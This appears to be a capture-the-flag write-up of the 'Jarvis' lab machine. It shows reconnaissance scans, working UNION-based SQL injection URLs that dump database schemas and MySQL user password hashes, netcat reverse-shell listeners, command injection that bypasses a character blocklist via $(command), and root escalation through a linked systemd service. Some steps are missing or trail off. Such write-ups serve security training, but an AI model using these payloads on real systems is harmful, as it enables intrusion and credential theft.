Vulnerability Explanation: The machine is vulnerable to SQL Injection which could allow us to query arbitrary data from databases and get credential to login on phpMyadmin. On phpMyadmin version is vulnerable to LFI which could allow us to execute command and gain initial access.
Vulnerability Fix: Sanitize user input and least privilege
Severity: Critical
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-22 10:45 EST
Nmap scan report for 10.10.10.143
Host is up (0.041s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Port 80 Apache httpd 2.4.25
Going through port 80, we just see a webpage. Viewing the source code but nothing is interesting.
Let run the gobuster to check if there any hidden directory as well as Nikto.
└─$ nikto -h http://10.10.10.143
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.143
+ Target Hostname: 10.10.10.143
+ Target Port: 80
+ Start Time: 2021-11-22 10:56:38 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'ironwaf' found, with contents: 2.0.3
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7863 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-11-22 11:03:20 (GMT-5) (402 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
By click all the buttons on the webpage, there is only /room.php not static.
SQL Injection (Mysql)
Once I have added ' to the end, it doesn't show anything.
I have tried UNION SELECT 1 but still the same. After adding from 1,2,3 to 7 it's just display.
http://10.10.10.143/room.php?cod=10 UNION SELECT 1,2,3,4,5,6,7;-- -
Likely it's vulnerable to SQL Injection. By Comparing the parameter below, if it doesn't return to the original page, which mean something wrong. If it returns back to original page, which mean it vulnerable to SQL Injection.
http://10.10.10.143/room.php?cod=1 UNION SELECT 1,2,3,4,5,6,7;-- -
We can assume SQL query like
select id, room, rating, description, price, details, book from where cod=1
As we can see the the Cost is in parameter 3. We can replace for testing.
http://10.10.10.143/room.php?cod=10 UNION SELECT "1","2","3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1","2","Testing","4","5","6","7"
Listing the DBs with group_concat() function will put all the value of different into one field.
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",group_concat(schema_name),"3","4","5","6","7" from information_schema.schemata
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select schema_name from INFORMATION_SCHEMA.SCHEMATA LIMIT 1),"3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select schema_name from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),"3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select schema_name from INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),"3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select group_concat(schema_name) from INFORMATION_SCHEMA.SCHEMATA ),"3","4","5","6","7"
GET /room.php?cod=10 UNION SELECT "1",(select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from INFORMATION_SCHEMA.columns where table_schema = 'hotel'),"3","4","5","6","7"
Checking on other databases.
/room.php?cod=10 UNION SELECT "1",(select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from INFORMATION_SCHEMA.columns where table_schema = 'mysql'),"3","4","5","6","7"
GET /room.php?cod=10 UNION SELECT "1",(select group_concat(host,":",user,":",password, "\r\n") from mysql.user),"3","4","5","6","7"
Now we have seen the username and password. Let save hash to a file and crack it if it's weak.
Let start our netcat listener on port 4444 and go to execute the shell.php file.
└─$ nc -lvp 4444
http://10.10.10.143/shell.php
Privilege Escalation
Shell as pepper
We are now on the machine, but we don't have permission to read the flag file.
www-data@jarvis:/home/pepper$ cat user.txt
cat: user.txt: Permission denied
www-data@jarvis:/home/pepper$ ls -l
total 8
drwxr-xr-x 3 pepper pepper 4096 Mar 4 2019 Web
-r--r----- 1 root pepper 33 Mar 5 2019 user.txt
Let check if there is any misconfigure on sudo -l.
www-data@jarvis:/home/pepper$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
There are 3 functions we can use, Statistics, List the attackers IP, Ping an Attacker IP.
We can input IP with Ping function and its going to execute the command ping. There is filter which special character that forbidden. But we can use $(command) function to execute.
def exec_ping():
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)
Let create a bash reverse shell into a file /tmp/shell.sh. Start our netcat on port 5555.
We cannot link the file on /tmp folder. Let move it to /home folder to link.
pepper@jarvis:/tmp$ systemctl link /tmp/file.service
Failed to link unit: No such file or directory
pepper@jarvis:/tmp$ systemctl link /home/pepper/root.service
Created symlink /etc/systemd/system/root.service -> /home/pepper/root.service.
pepper@jarvis:~$ systemctl enable --now /home/pepper/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /home/pepper/root.service.
We can refer to MySQL Cheat Sheet of .
Going through , we can perform privilege escalation by /bin/systemctl.
